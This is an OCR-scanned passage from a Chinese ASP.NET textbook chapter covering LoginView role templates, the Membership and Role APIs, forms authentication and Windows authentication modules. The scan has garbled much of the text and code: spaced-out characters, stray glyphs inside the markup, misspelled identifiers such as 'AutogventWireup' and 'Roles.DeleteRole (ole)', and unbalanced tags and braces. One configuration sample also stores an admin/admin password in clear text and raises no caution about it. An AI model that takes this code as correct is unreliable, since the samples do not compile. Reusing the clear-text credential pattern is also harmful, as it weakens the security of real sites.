录 的 用 户 和 匿名 用 户 提 供 不 同 的 界面 和 功能 。 在 上 面 的 代码 中 ，LoginView 为 登录 的 用 户 
显示 “这 个 部 分 只 有 通过 验证 的 用 户 才能 看 见 ”， 而 为 匿名 用 户 显示 了 一 个 Login 控件 ， 
使 匿名 用 户 能 够 进行 登录 操作 。 

除了 直接 使 用 LoggedInTemplate 和 AnonymousTemplate 两 个 模板 直接 为 登录 用 户 和 匿 
名 用 户 提 供 不 同 的 界面 和 功能 以 外 ， 还 可 以 为 每 个 角色 提供 不 同 的 界面 和 功能 。 在 
LoginView 中 ， 使 用 RoleGroup 属性 节点 进行 配置 ， 为 指定 的 角色 设置 相应 的 内 容 即 可 。 
在 RoleApplicatio 站 点 应 用 程序 中 ， 修 改 Default.aspx 文件 ， 如 下 所 示 : 


<%@ Page Language="C#" AutogventWireup="true" CodeFile="Default.aspx.cs" 
Inherits=" Default"%> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www. 
Ww3.0rg/TR/xhtml1/DTD/xhtmll-transitional.dtd"> 
<html xmlns="http://www.w3.0org/1999/xhtml" > 
<head runat="server"> 
<title>Untitled Page</title> 
</head> 
<body> 
<form id="forml" runat="server"> 
<div> 
<asp:LoginView ID="LoginViewl" runat="server"> 
<LoggedInTemplate> 
这 个 部 分 只 有 通过 验证 的 用 户 才能 看 见 
</LoggedIinTemplate> 
<AnonymousTemplate> 
<asp:Login ID="Loginl" runat="server"> 
</asp:Login> 
</AnonymousTemplate> 
<RoleGroups> 
<asp:RoleGroup Roles="Admin"> 
<ContentTemplate> 
<asp:LoginStatus ID="Loginstatusl" runat="server" /> 
< /> 


您 是 管理 员 


人 
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</ContentTemplate> 
</asp:RoleGroup> 
<asp:RoleGroup Roles="User"> 


<ContentTemplate> 
<asp:LoginStatus ID="LoginStatus2"” runat="server" /> 
<br /> 
普通 用 户 
</ContentTemplate> 
</asp:RoleGroup> 
</RoleGroups> 
</asp:LoginView> 
</div> 
</form> 
</body> 
</html> 


在 LoginView 中 增加 了 RoleGroups 配置 节点 , 在 节点 内 用 RoleGroup 为 相应 的 角色 指 
定 显示 内 容 。 在 Default.aspx 中 ， 如 果 使 用 Admin 角色 的 用 户 登录 ， 那 么 将 得 到 如 图 8-16 
所 示 的 内 容 ; 如果 使 用 User 角色 的 用 户 登 录 ， 则 可 以 得 到 如 图 8-17 所 示 的 内 容 。 
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图 8-16 管理 员 登 录 后 的 页 面 内 容 图 8-17 User 角色 的 用 户 登录 以 后 的 default.aspx 页 面 


8.2.5 ”使 用 Membership/Role API 添加 用 户 


除了 通过 CreateUserWizard 添 加 用 户 以 外 , 还 可 以 直接 通过 Membership API 添 加 用 户 。 
下 面 举例 说 明 如 何 通 过 Membership API 添加 用 户 。 打 开 membershipDemo 站 点 ， 新 建 
ApiAddUseraspx 页 面 。 

接 下 来 切换 到 页 面 的 HIML 代码 视图 ， 在 视图 中 添加 下 面 的 代码 : 


<body> 
<form id="forml" runat="server"> 
<div> 
<table> 


<tr> 
<td colspan="2" align=center> 
<strong>Sign up for new user</strong></td> 
</tr> 
4 中 池 3 
<td style="width: 123px"> 
<asp:Label ID="Labell" runat="server" Text="User Name"> 
</asp:Label></td> 
<td style="width: 103px"> 
<asp:TextBox ID="UserNameText" runat="server"> 
</asp:TextBox></td> 


人 
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*160* 


=/ErS 
E> 
<td style="width: 123px"> 
<asp:Label ID="Label2" runat="server" Text="Password"> 
</asp:Label></td> 
<td style="width: 103px"> 
<asp:TextBox ID="PasswordText" runat="server"> 
</asp:TextBox></td> 
</tr> 
<tr> 
<td style="width: 123px"> 
<asp:Label ID="Label3" runat="server" Text="Confirm 
Password" 
Width="119px"></asp:Label></td> 
<td style="width: 103px"> 
<asp:TextBox ID="Password2Text" runat="server"> 
</asp:TextBox></td> 
< 人 LE 
RE 
<td style="width: 123px"> 
<asp:Label ID="Label4" runat="server" Text="Email"> 
</asp:Label></td> 
<td style="width: 103px"> 
<asp:TextBox ID="EmailText" runat="server"> 
</asp:TextBox></td> 
Cr 
E> 
<td style="width: 123px"> 
<asp:Label ID="Label5" runat="server" Text="FirstName"> 
</asp:Label></td> 
<td style="width: 103px"> 
<asp:TextBox ID="FirstNameText" runat="server"> 
</asp:TextBox></td> 
</Er> 
Er 
<td style="width: 123px; height: 21px;"> 
<asp:Label ID="Label6" runat="server" Text="LastName"> 
</asp:Label></td> 
<td style="width: 103px; height: 21px;"> 
<asp:TextBox ID="LastNameText" runat="server"> 
</asp:TextBox></td> 
</tr> 
si 
<td style="width: 123px"> 
<asp:Label ID="Label7" runat="server" Text="Birthdate"> 
</asp:Label></td> 
<td style="width: 103px"> 
<asp:TextBox ID="BirthdateText" runat="server"> 
</asp:TextBox></td> 
赤 /tEE 
< 
<td style="width: 123px"> 
<asp:Label ID="Label8" runat="server" Text="Security 
Question"></asp:Label></td> 
<td style="width: 103px"> 
<asp:TextBox ID="SecQuestionText" runat="server"> 
</asp: TextBox></td> 
< HEr> 
< 在 E> 
<td style="width: 123px"> 
<asp:Label ID="Label9" runat="server" Text="Qeustion 
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Answer"></asp:Label></td> 
<td style="width: 103px"> 
<asp:TextBox ID="SecAnswerText" runat="server"> 
</asp: TextBox></td> 
</tr> 
<tr> 
<td colspan="2" align="center"> 
<asp:Button ID="ConfirmButton" runat="server" Text= 
"Confirm" OnClick="ConfirmButton Click" /></td> 
< 
</table> 
< 
</div> 
</form> 
</body> 


为 了 简洁 ， 只 把 <body> 节 点 内 部 的 内 容 列举 出 来 。 在 ApiAddUser.aspx.cs 中 使 用 
Membership API 添加 用 户 代码 ， 如 下 所 示 : 


public partial class ApiAddUser : System.Web.UI.Page 
protected void Page Load (object sender, EventArgs e) 
{ 
} 
protected void ConfirmButton Click(object sender, EventArgs e) 


{ 
MembershipCreateStatus status ; 
Membership.CreateUser (UserNameText .Text, PasswordText.Text, 
EmailText.Text, 
SecQuestionText.Text, SecAnswerText.Text, true, out status); 
if (status == MembershipCreateStatus .Success) 
{ 
Response .Write("Successfully add user"); 
this .forml.Visible = false; 
} 
else 
{ 
Response.Write(status.ToString()); 
this.forml .Visible = false; 
’ 
} 
在 上 面 代码 中 ， 在 protected void ConfirmedButton Click 方法 内 部 ， 调 用 


Membership.CreateUser 方法 添加 用 户 。 通 过 MembershipCreateStatus 类 型 的 输出 参数 来 判 
断 添加 是 否 成 功 或 者 获取 错误 信息 。 

MemberShip API 除了 可 以 用 来 添加 用 户 以 外 , 还 提供 了 删除 用 户 的 功能 、 查 找 用 户 的 
功能 等 等 。 下 面 对 一 些 主要 的 方法 进行 说 明 : 
口 Membership.CreateUser: 该 方法 用 于 添加 用 户 。 
口 Membership.DeleteUser: 该 方法 用 来 删除 用 户 ， 以 用 户 名 为 参数 。 
口 Membership.FindUserByEmail: 该 方法 用 Email 查找 用 户 ， 并 返回 这 个 用 户 对 象 。 
口 Membership .FindUserByName: 该 方法 用 Name 属性 查找 用 户 ， 并 返回 这 个 用 户 
对 象 。 
Membership.GetUser: 该 方法 返回 符合 要 求 的 用 户 对 象 。 
Membership.UpdateUser: 该 方法 更 新 该 用 户 的 信息 。 





























口 





局 





a 
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口 Membership.ValidateUser: 该 方法 检查 用 户 名 和 密码 是 否 能 通过 登录 验证 。 
通过 上 面 这 些 方法 和 一 些 静态 属性 方法 ， 可 以 实现 对 ASP.NET 应 用 程序 的 用 户 管理 。 
例如 ， 现 在 要 自行 控制 用 户 登录 验证 的 过 程 ， 那 么 可 以 调用 ValidateUser 方法 ， 如 下 面 的 
代码 所 示 : 
if (Membership.ValidateUser (username, password) 


上 





， FormsAuthentication.RedirectFromLoginPage (username, False); 

在 上 面 的 代码 中 ， 首 先 使 用 usemame 和 password 的 值 对 用 户 进行 验证 ， 如 果 通 过 验 
证 则 执行 FormsAuthentication.RedirectFormLoginPage(usemame, false) 重 定向 页 面 到 上 一 个 
试图 访问 的 页 面 。 

Membership API 还 提供 了 在 线 用 户 统计 功能 ， 即 Membership.GetNumberOfUsers- 
Online(0) 方 法 。 这 个 方法 和 web.config 或 machine.config 文件 中 的 <membership> 配 置 节 有 关 。 
如 果 在 web.config 中 配置 如 下 代码 : 


<membership usersIsOnlineTimeWindow=15></membership> 


15 表示 了 每 隔 15 分 钟 进行 一 次 统计 ， 检 查 用 户 是 否 在 线 。 那 么 意味 着 在 执行 
GetNumberOfUsersOnline() 时 统计 过 去 15 分 钟 曾经 在 线 的 用 户 。 

除了 通过 ASPNET 管理 站 点 的 安全 配置 页 面 对 用 户 的 角色 进行 管理 以 外 ， 还 可 以 直 
接 通过 代码 来 获取 、 添 加 、 删 除 角 色 以 及 为 用 户 指定 角色 等 。 下 面 的 代码 演示 了 如 何 从 C# 
代码 中 添加 角色 和 获取 已 存在 的 用 户 角 色 。 在 RoleApplication 站 点 中 添加 Addrole.aspx 页 
面 ， 如 图 8-18 所 示 。 


到 Untitled Page - Microsoft Internet Explorer 


| 文件 加” 编辑 四。 查看 W 收藏 提 工具 玫 助 呈 | 著 
| 地址 @) [ 轿 http:/hocahost:2157/RoleAppication/Addrole. 加] 园 甘 到 











现 有 角色 [Admin -| 删除 选 定 角 色 | 
请 得 入 角色 名 称 : 添加 | 


| 本 本 地 Intranet 








图 8-18 ”Role 添加 删除 页 面 


Addrole.aspx 页 面 代码 如 下 : 


<%@ Page Language="C#" RutoEventWireup="true" CodeFile="AddRole.aspx.cs" 
Inherits="AddRole" %> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www. 
Ww3.0rg/TR/xhtml1/DTD/xhtml1l-transitional.dtd"> 
<html xmlns="http://www-w3-org/1999/xhtml > 
<head runat="server"> 
<title>Untitled Page</title> 
</head> 
<body> 
<form id="forml" runat="server"> 
<div> 


<asp:Label ID="Label2" runat="server"” Text=" 现 有 角色 "></asp:Label> 
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&nbsp; 
<asp:DropDownList ID="DropDownList1"” runat="server"> 
</asp:DropDownList> 
<asp:Button ID="Button2" runat="server" OnClick="Button2 Click" 
Text=" 删 除 选 定 角色 " />gnbsp;<br /> 
&nbsp; <br /> 
<asp:Label] ID="Labell"” runat="server"” Text=" 请 输入 角色 名 称 : "></asp: 
Label> 
<asp:TextBox ID="TextBoxl" runat="server"></asp:TextBox> 
<asp:Button ID="Buttonl" runat="server" OnClick="Buttonl Click" 
Text=" 添 加 "” /> 
</div> 
</form> 
</body> 
</html> 





Addrole.aspx.cs 代码 如 下 所 示 : 


public partial class AddRole : System.Web.UI.Page 
‘ 
protected void Page Load (object sender, EventArgs e) 
{ 
if (!this.IsPostBack) 


{ 
DropDownList1.DataSource = Roles.GetAllRoles (); 


DropDownListl1.DataBind(); 
} 
} 
protected void Buttonl Click(object sender, EventArgs e) 


{ 
Roles.CreateRole (TextBox] .Text); 
DropDownList1.DataSource = Roles.GetAllRoles (); 
DropDownList1 .DataBind(); 

} 

protected void Button2 Click(object sender, EventArgs e) 


区 
if (DropDownList1.SelectedIndqex >= 0) 


string role = DropDownList1l1.Items [DropDownList1.SelectedIndex] . 


Value 

Roles.DeleteRole (ole) 
DropDownList1.DataSource = Roles.GetAllRoles (); 
DropDownList]1 .DataBind(); 


} 


在 上 面 代 码 中 ，Roles.CreateRole 方法 用 来 创建 指定 的 角色 ; Roles.GetAllRoles 方法 返 
回 了 所 有 登记 在 案 的 角色 名 称 ; Roles.Delete 方法 则 用 来 删除 指定 的 角色 名 称 。 上 面 代 码 中 
仅仅 向 ASP.NET 应 用 程序 添加 了 用 户 角 色 ， 并 没有 使 用 户 与 角色 相关 联 。 

没有 加 入 用 户 的 角色 是 没有 任何 用 处 的 ， 下 面 的 例子 演示 了 如 何 将 现 有 的 用 户 添 加 到 
一 个 新 的 角色 中 去 。 在 RoleApplication 站 点 中 添加 ManageUserInRole.aspx 页 面 ， 代 码 
如 下 : 


<%@ Page Language="C#" AutoEgventWireup="true" CodeFile="AddUserToRole. 
aspx.cs" Inherits="RddUserToRole" 当 > 

<html xmlns="http://www.w3.org/1999/xhtml" > 

<head runat="server"> 
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<title>Untitled Page</title> 
</head> 
<body> 


E 


。164 。 


<form id="forml" runat="server"> 
<div> 


<asp:Label] ID="Labell" runat="server"” Text=" 用 户 名 : "></asp:Label> 
&nbsp; 
<asp:DropDownList ID="DropDownListl" runat="server" AutoPostBack= 
Ee 
OnSelectedIndexChanged="DropDownListl1 SelectedIndexChanged"> 
</asp:DropDownList> 
<asp:Label ID="Label2"” runat="server"” Text=" 用 户 所 属 角 色 : "></asp: 
Label> 
<asp:ListBox ID="ListBoxl" runat="server"></asp:ListBox> 
<asp:Button ID="DeleteUserRoleBtn" runat="server" OnClick= 
"DeleteUserRoleBtn Click" 

Text=" 删 除 ” /><br /> 
<br /> 
将 用 户 添加 到 新 的 角色 : <asp:ListBox ID="ListBox2" runat="server" 
SelectionMode="Multiple"></asp:ListBox> 
<asp:Button ID="AddToRoleBtn" runat="server" OnClick="AddToRoleBtn 
Click"” Text=" 添 加 " 
/></div> 








</form> 

</body> 

</html> 

页 面 用 DropDownList 控件 显示 用 户 ，ListBox 控件 列 出 用 户 所 拥有 的 角色 ， 还 删除 按 
钮 用 来 移 除 用 户 的 一 个 角色 。 

服务 器 端 代码 如 下 : 


public partial class AddUserToRole : System.Web.UI.Page 


protected void Page Load(object sender, EventArgs e) 


{ 


BE 


if (!this.IsPostBack) 

{ 
DropDownList1 .DataSource = Membership.GetAllUsers (); 
DropDownList]1 .DataBind(); 
ListBoxl.DataSource = Roles.GetAllRoles (); 
ListBoxl .DataBind(); 
ListBox2.DataSource = Roles.GetAllRoles (); 
ListBox2.DataBind(); 


protected void DropDownListl1 SelectedIindexChanged (object sender， 
EventArgs e) 


{ 


J]; 


if (((DropDownList)sender) .SelectedIndex >= 0) 
' 
string[] roles = Roles.GetRolesForUser (DropDownList1.Items 
[((DropDownList) sender) .SelectedIndex] .Value); 
ListBoxl .DataSource = roles; 
ListBoxl .DataBind(); 
} 


protected void AddToRoleBtn Click(object sender, EventArgs e) 


{ 
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if (ListBox2.SelectedIndex >= 0) 
| 
Roles.AddUserToRole (DropDownList1l1.Items [DropDownListl- 
SelectedIndex] .Value， 
ListBox2 .Items [ListBox2.SelectedIndex] .Value) 
BindUserRole(); 


} 
protected void DeleteUserRoleBtn Click(object sender, EventArgs e) 
{ 


if (ListBoxl.SelectedIndex >= 0) 

{ 
Roles.RemoveUserFromRole (DropDownList1.Items [DropDownList1l. 
SelectedIndex] .Value，ListBox1l.Items [ListBox1.SelectedIndex] . 
Value); 
BindUserRole(); 

上 

} 


private void BindUserRole() 


ListBoxl .DataSource = Roles.GetRolesForUser (DropDownList1l1.Items 
[DropDownList1.SelectedIndex] .Value); 
ListBoxl .DataBind(); 


} 


上 面 的 代码 演示 了 使 用 Roles.AddUserToRole 方法 将 用 户 添加 到 一 个 Role 中 ， 
Roles.GetRolesForUser 方法 用 于 获取 用 户 角 色 ，Roles.RemoveUserFromRole 方法 用 于 从 某 
个 角色 中 移 除 用 户 。 

其 中 , Roles.AddUserToRole 方法 还 有 3 个 类 似 的 方法 , 它们 是 Roles.AddUsersToRole、 
Roles.AddUserToRoles 和 Roles.AddUsersToRoles 方法 , 可 以 同时 对 多 个 用 户 或 多 个 角色 进 
行 操作 。 


8.3 窗 体 验证 


基于 窗 体 的 身份 验证 模式 是 目前 比较 常见 的 身份 验证 方法 ， 在 整合 global.asa 和 
web.config 后 可 以 快速 实现 用 户 的 身份 验证 。 一 般 该 过 程 先 建立 一 个 文件 夹 ， 然 后 把 要 保 
护 的 页 面 放 进去 ， 接 着 设置 web.config 完成 验证 工作 。 如 果 要 访问 这 个 文件 来， 就 会 被 强 
制 转 到 预先 设 定 的 登录 页 面 ， 在 用 户 填 写 正确 的 用 户 名 和 密码 并 提交 系统 验证 后 ， 把 登录 
信息 写 到 Cookie 里 ， 这 样 用 户 就 可 以 正常 访问 文件 夹 了 。 

这 里 需要 读者 明确 的 是 如 何 配置 窗 体验 证 参数 ， 首 先是 创建 一 个 ASPNET 应 用 程序 ， 
这 里 面包 含 登录 页 面 ， 然 后 修改 根 目录 下 的 web.config， 把 相关 验证 的 配置 节 改 成 Forms 
验证 模式 ， 其 代码 如 下 : 

<authentication mode="Forms"> 

<forms loginUrl="Login.aspx" /> 
</authentication> 


<authorization> 
<deny users="?" /> 





I 
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</authorization> 


在 知道 如 何 配 置 后 ， 接 着 就 在 需要 保护 的 文件 夹 中 创建 web.config。 需 要 注意 的 是 ， 
这 个 子 文件 夹 中 的 web.config 实际 内 容 不 能 和 根 目录 下 一 样 , 否则 就 会 出 现 “ 配 置 错 误 ”， 
例如 : 在 应 用 程序 级 别 以 外 使 用 注册 allowDefinition="MachineToApplication' 节 是 错误 的 。 

在 web.config 中 可 以 进一步 设置 可 以 访问 系统 的 角色 ， 这 需要 配置 验证 节 。 在 该 配置 
节 可 以 允许 列 出 角色 名 称 ， 其 配置 代码 如 下 : 


<configuration> 
<system.web> 
<authorization> 
<! 一 -设置 准许 访问 此 文件 夹 的 角色 和 拒绝 的 角色 , 这 里 准许 管理 员 , 老师 访问 , 拒绝 学 生 访 
问 --> 
<allow roles="admin" /> 
<allow roles="teacher" /> 
<deny roles="student" /> 
<!-- 前 提 是 拒绝 匿名 用 户 !--> 
<deny users="?" /> 
</authorization> 
</system.web> 
</configuration> 


男 外， 也 可 以 在 根 目录 的 web.config 文件 中 完成 所 有 的 url 授权 ， 而 不 是 把 它们 在 各 
自 目 录 下 的 web.config 文件 中 完成 。 

下 面 的 实例 代码 用 来 保护 admin 文件 夹 下 的 内 容 ， 拒 绝 匿 名 用 户 访问 。 
<location path="admin"> 

<system.web> 

<authorization> 

<deny users="?"></deny> 
</authorization> 


</system.web> 
</location> 


至 此 ， 基 本 的 窗 体验 证 参数 就 设置 完成 了 。 接 下 来 开始 编写 窗 体验 证 代码 ， 一 般 有 两 
种 方式 : 配置 方式 和 与 数据 库 结合 的 方式 。 


1， 配置 方式 





配置 方式 的 应 用 条 件 是 网 站 的 用 户 不 是 很 多 的 时 候 ， 这 时 可 以 把 用 户 和 密码 放 到 
web.config 里 。 具 体 来 说 , 就 是 在 根 目 录 下 的 web.config 文件 中 加 入 一 个 配置 节 credentials， 
包括 用 户 名 和 密码 ， 其 代码 如 下 : 

<authentication mode="Forms" > 

<forms loginUrl="]login.aspx"> 
<credentials passwordFormat="Clear"> 
<user name="admin" password="admin"/> 
</credentials> 

</forms> 

</authentication> 

在 此 种 情况 下 ， 需 要 配合 使 用 System.Web.Security.FormsAuthentication.Authenticate 
(string name,string password) 验证 credentials 节 中 指定 的 用 户 名 和 密码 ， 假 如 能 够 获取 账 
户 信 息 则 返回 true。 
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2. 与 数据 库 结合 的 方式 














在 数据 库 结合 方式 中 ， 利 用 数据 库 读 取 用 户 名 密码 进行 验证 ， 而 非 配置 节 中 的 数据 。 
具体 设计 步骤 如 下 : 
(1) 在 数据 库 里 建立 三 张 表 : 
口 Users (UserID,UserName,UserPwd) : 存放 用 户 信息 。 
口 Roles (RoleID,RoleName) : 存放 角色 信息 。 
口 User Role〈UserID,RoleID) : 用 户 信息 表 和 角色 信息 表 的 中 间 表 ， 使 这 两 张 表 成 
为 多 对 多 关系 。 
(2) 在 登录 页 面 中 的 “登录 ”按钮 单 击 事件 中 加 入 如 下 代码 ， 验 证 用 户 输入 的 账户 
信息 : 


if (Page.IsValid) 
{ 














if(Users.Authenticate (txtUsername.Text, txtPassword.Text)) 


// 数据 库 验 证 方法 , 代码 略 
// 验证 后 导向 初始 页 


FormsAuthentication.RedirectFromLoginPage (txtUsername.Text, 
chkRemember.Checked ; 
} 


{ 


上 面 的 例子 也 可 以 使 用 FormsAuthentication.SetAuthCookie 方法 ,该 方法 不 进行 页 面 导 
向 ， 而 是 停留 在 当前 页 ， 然 后 由 用 户 自己 选择 导向 的 页 面 。 

(3) 使 用 global.asax 文件 下 的 Application AuthenticateRequest 事件 ， 此 事件 在 每 次 访 
问 .aspx 文件 时 都 会 触发 。 

用 户 角 色 信 息 的 读 取 和 保存 都 需要 在 事件 Application AuthenticateRequest 执行 ， 它 通 
过 窗 体验 证 类 FormsAuthenticationTicket 的 方法 添加 和 保存 信息 。 在 窗 体验 证 过 程 中 需要 
利用 Cookies 加 密 保存 信息 ， 而 保存 的 票据 主要 包括 角色 的 属性 和 到 期 时 间 。 

窗 体验 证 事件 代码 如 下 : 
人 void Application AuthenticateRequest (Object sender, EventArgs e) 


if (Request.IsAuthenticated == true) // 如 果 验 证 了 用 户 , 则 为 true; 否则 为 false 
{ 
String[] roles; 
// 首次 登录 , 还 没有 存 入 角色 Cookies 
if ((Request.Cookies["userlroles"] == null) 11 
(Request.Cookies["userlroles"] .Value == "")) 
// 此 时 调用 方法 ,访问 数据 库 中 的 记录 获得 用 户 角色 , 并 存 入 Cookies 
roles =(String[]) 
Users.GetRoles (User.Identity.Name) .ToArray (typeof (String)); 
SErLNg TOLSSEr = me 
foreach (String role in roles) 
// 一 个 用 户 会 有 多 种 角色 ,以 一 个 字符 串 表示 , 用 ; 隔 开 
| 
roleSstr += role; 
TOGStr = 
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// 创建 Cookies 票据 


FormsAuthenticationTicket ticket = new FormsAuthenticationTicket( 


1， // 版 本 

Context .User .Identity.Name, // 登录 时 存 入 的 标识 用 户 的 用 户 名 
DateTime .Now, // 发 布 时 间 
DateTime.Now.AddHours (1)， // 过 期 时 间 
false, // 是 否 持久 
rolestr // 角色 字符 串 


) 7 
// 加 密 票 据 
String CookieStr = FormsAuthentication.Encrypt (ticket) 


// 发 送 到 客户 端 , 起 名 userroles 

Response.Cookies ["userroles"] .Value = CookieStr;// 必须 加 密 
Response.Cookies ["userroles"].Path = "/"; 
Response.Cookies ["userroles"] .Expires = 
DateTime.Now.AddMinutes (1) 


} 
else 
{ // 已 存在 , 读 取 ,解密 
FormsAuthenticationTicket ticket = 
FormsAuthentication.Decrypt (Context .Request .Cookies["userroles"] .Value); 
// 把 角色 字符 添加 到 1ist 里 
ArrayList userRoles = new ArrayList(); 
foreach (String role in ticket.UserData.Split( new char[] {';'} )) 
{ 
userRoles.Add (role); 
} 
roles = (String[]) userRoles.ToArray (typeof (String)); 
} 
// 把 此 用 户 的 角色 存 到 内 存 中 ,可 以 运用 User.IsInRole () 方 法 进行 检验 用 户 角色 
// 也 可 以 使 用 实现 IPrincipal 接口 的 类 , 自 定义 赋值 给 Context .User 
Context .User= new GenericPrincipal (Context .User.Identity .Now. 
AddHours (1), roles); 


| 


(4) 添加 读 取 和 验证 用 户 是 否 存在 获得 用 户 角色 的 代码 ， 这 里 主要 针对 数据 库 中 的 表 
写 出 获得 用 户 角色 的 存储 过 程 。 

在 存储 过 程 代 码 中 利用 多 表 联 查 的 方法 ， 将 用 户 表 和 角色 表 的 数据 整合 成 符合 条 件 的 
角色 信息 。 

获取 用 户 角色 的 存储 过 程 脚本 如 下 : 

CREATE PROCEDURE User GetUserRolesByUsername 

( 





@Username nvarchar(50) 
) 
AS 
select Roles.RoleName 
from Roles 
join Users on Users.Username=@Username 
join User Role on User Role.UserID=Users.UserID 


- Me 
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where Roles.RoleID=User Role-RoleID 
GO 


84 混合 认证 


操作 系统 集成 验证 是 一 种 依附 于 操作 系统 的 验证 方法 ， 是 很 多 大 企业 内 部 系统 采用 的 
解决 方案 。 利 用 员工 的 计算 机 作为 客户 端 ， 公 司 的 服务 器 作为 验证 端 ， 把 身份 验证 工作 交 
由 计算 机 自行 完成 。 

ASP.NET 支持 使 用 Windows 身份 验证 的 自 定义 解决 方案 ( 避 开 了 IIS 身份 验证 ) 。 例 
如 ， 可 以 编写 一 个 根据 Active Directory 创建 的 用 户 验证 体系 。 

如 果 应 用 程序 使 用 Active Directory 用 户 存储 ， 则 应 该 使 用 集成 Windows 身份 验证 。 
对 ASP.NET 应 用 程序 使 用 集成 Windows 身份 验证 时 ， 最 好 的 方法 是 使 用 ASP.NET 的 
Windows 身份 验证 提供 程序 附带 的 Intemet 信息 服务 身份 验证 方法 。 

本 节 将 先 从 简单 的 Windows 验证 开始 , 讲解 如 何 利用 活动 目录 创建 高 可 靠 度 的 企业 身 
份 验证 体系 。 


8.4.1 基于 IIS 的 Windows 身份 验证 


在 基于 IIS 的 身份 验证 中 ，IIS 向 ASP.NET 传递 代表 经 过 身份 验证 的 用 户 或 匿名 用 户 
账户 的 令 牌 。 该 令 牌 在 一 个 包含 在 iprincipal 对 象 中 的 iidentity 对 象 中 维护 ，iprincipal 对 象 
进而 附加 到 当前 Web 请 求 线程 ， 可 以 通过 httpcontext.user 属性 访问 iprincipal 和 iidentity 
对 象 。 这 些 对 象 和 该 属性 由 身份 验证 模块 设置 ， 这 些 模块 作为 HTTP 模块 实现 并 作为 
ASP.NET 管道 的 一 个 标准 部 分 进行 调用 ， 如 图 8-19 所 示 。 
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ASP.NET 验证 管道 模型 包含 一 个 httpapplication 对 象 、 多 个 HITP 模块 对 象 ， 以 及 一 
个 HTTP 处 理 程序 对 象 及 其 相关 的 工厂 对 象 。httpruntime 对 象 用 于 处 理 序列 的 开头 。 在 整 
个 请 求生 命 周期 中 ，httpcontext 对 象 用 于 传递 有 关 请 求 和 响应 的 详细 信息 。 

对 于 身份 验证 模块 ， ASP.NET 允许 在 web.config 文件 中 定义 一 组 HTTP 模块 。 其 中 包 
括 大 量 身份 验证 模块 ， 如 下 所 示 : 


<httpModules> 
<add name="WindowsAuthentication" 
type="System.Web.Security.WindowsAuthenticationModule" /> 
<add name="FormsAuthentication" 
type="System.Web.Security.FormsAuthenticationModule" /> 
<add name="PassportAuthentication" 
type="System.Web.Security.PassportAuthenticationModule" /> 
</httpModules> 
身份 验证 模块 的 加 载 数量 取决 于 该 配置 文件 的 authentication 元 素 中 指定 了 哪 种 身份 验 
证 模式 。 上 面 例 子 中 的 身份 验证 模块 创建 一 个 iprincipal 对 象 并 将 它 存储 在 httpcontext.user 
属性 中 。 这 是 很 关键 的 ， 因 为 其 他 授权 模块 会 使 用 该 iprincipal 对 象 做 出 授权 决定 。 
当 IIS 中 启用 匿名 访问 且 authentication 元 素 的 mode 属性 设置 为 none 时 ， 会 把 默认 的 
匿名 原则 添加 到 httpcontext.user 属性 中 ， 在 进行 身份 验证 之 后 ，httpcontextuser 不 是 空 
引用 。 
如 果 web.config 文件 包含 以 下 元 素 ， 则 激活 windowsauthenticationmodule 类 。 


<authentication mode="Windows" /> 








WindowsAuthenticationModule 类 负责 创建 windowsprincipal 和 windowsidentity 对 象 表 
示 经 过 身份 验证 的 用 户 ， 并 且 负 责 将 这 些 对 象 附 加 到 当前 Web 请 求 。 

对 于 Windows 身份 验证 ， 遵 循 以 下 步骤 : 

(1) WindowsAuthenticationModule 使 用 从 IIS 传递 到 ASP.NET 的 Windows 访问 令 牌 
创建 一 个 windowsprincipal 对 象 。 该 令 牌 包装 在 httpcontext 类 的 workerrequest 属性 中 。 引 
发 authenticaterequest 事件 时 ，windowsauthenticationmodule 从 httpcontext 类 检索 该 令 牌 并 
创建 windowsprincipal 对 象 。httpcontext.user 用 该 windowsprincipal 对 象 进行 设置 ， 表 示 所 
有 经 过 身份 验证 的 模块 和 ASP.NET 经 过 身份 验证 的 用 户 安全 上 下 文 。 

(2)WindowsAuthenticationModule 类 使 用 P/Invoke 调用 Win32 函数 并 获得 该 用 户 所 属 
的 Windows 组 的 列表 ， 这 些 组 用 于 填充 windowsprincipal 角色 列表 。 

(3) WindowsAuthenticationModule 类 将 windowsprincipal 对 象 存储 在 httpcontext.user 
属性 中 ， 授 权 模 块 对 经 过 身份 验证 的 用 户 授权 。 





全 注意 : defaultauthenticationmodule 类 (也 是 ASP.NET 管道 的 一 部 分 ) 将 thread.currentp- 
rincipal 属性 值 设 置 为 与 httpcontext.user 属性 一 样 ， 它 在 处 理 authenticaterequest 
事件 之 后 进行 此 操作 。 


授权 模块 在 计算 机 级 别 的 web.config 文件 的 httpmodules 元 素 中 定义 ， 代 码 如 下 所 示 : 


<httpModules> 
<add name="UrlAuthorization™ 
type="System.Web.Security.UrlAuthorizationModule" /> 
<add name="FileAuthorization" 
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type="System.Web.Security.FileAuthorizationModule" /> 
<add name="AnonymousIdentification™ 
type="System.Web.Security.AnonymousIdentificationModule" /> 

</httpModules> 

urlauthorizationmodule 

调用 urlauthorizationmodule 类 时 ， 程 序 会 在 计算 机 级 别 或 应 用 程序 特定 的 web.config 
文件 中 查找 authorization 元 素 。 如 果 存 在 该 元 素 ， 则 urlauthorizationmodule 类 从 
httpcontext.user 属性 检索 iprincipal 对 象 ， 然 后 使 用 指定 的 动词 (GET、POST 等 ) 确定 是 
和 否 授权 给 该 用 户 ， 让 其 访问 请 求 的 资源 。 

接 下 来 会 自动 调用 名 eauthorizationmodule 类 , 用 来 检查 httpcontext.user.identity 属性 中 
的 iidentity 对 象 是 否 是 windowsidentity 类 的 一 个 实例 。 如 果 identity 对 象 不 是 
windowsidentity 类 的 一 个 实例 ， 则 fleauthorizationmodule 类 停止 处 理 。 

如 果 identity 对 象 是 windowsidentity 类 的 一 个 实例 ， 则 fileauthorizationmodule 类 调用 
Accesscheck Win32 函数 (通过 P/Invoke) 确定 是 否 授权 经 过 身份 验证 的 客户 端 访问 请 求 的 
文件 。 如 果 文 件 的 安全 描述 符 的 随机 访问 控制 列表 (DACL) 中 至 少 包含 一 个 read 访问 控 
制 项 (ACE ) ， 则 允许 该 请 求 继续 ; 否则 ，fleauthorizationmodule 类 调用 
httpapplication.completerequest 方法 并 返回 状态 码 401 到 客户 端 。 

在 ASPNET 中 , windowsprincipal 和 windowsidentity 类 表示 使 用 Windows 身份 验证 方 
法 进行 身份 验证 用 户 的 安全 上 下 文 。 使 用 Windows 身份 验证 的 ASPNET 应 用 程序 可 以 通 
